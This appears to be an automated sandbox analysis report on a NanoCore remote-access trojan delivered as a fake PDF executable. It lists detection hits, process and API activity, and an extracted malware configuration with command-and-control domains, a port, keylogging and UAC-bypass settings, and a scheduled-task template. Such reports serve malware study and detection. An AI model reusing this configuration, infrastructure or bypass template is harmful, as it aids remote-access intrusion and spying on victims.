Source: Yara match | File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
Source: 026910003102350.pdf.scr.exe | ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe | Virustotal: Detection: 45%
Source: december2nd.ddns.net | Virustotal: Detection: 12%
Source: december2n.duckdns.org | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | ReversingLabs: Detection: 46%
Source: 3.2.RegSvcs.exe.60b0000.7.unpack | Avira: Label: TR/NanoCore.fadte
Source: 19.2.RegSvcs.exe.d00000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 026910003102350.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 026910003102350.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CEB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034C642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00387248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

      Networking

      Source: unknown DNS query: name: december2n.duckdns.org
      Source: unknown DNS query: name: december2nd.ddns.net
      Source: Malware configuration extractor URLs: december2n.duckdns.org
      Source: Malware configuration extractor URLs: december2nd.ddns.net
      Source: Joe Sandbox View ASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox View IP Address: 212.193.30.230 212.193.30.230
      Source: global traffic TCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

      E-Banking Fraud


      Operating System Destruction

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00

      System Summary

      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
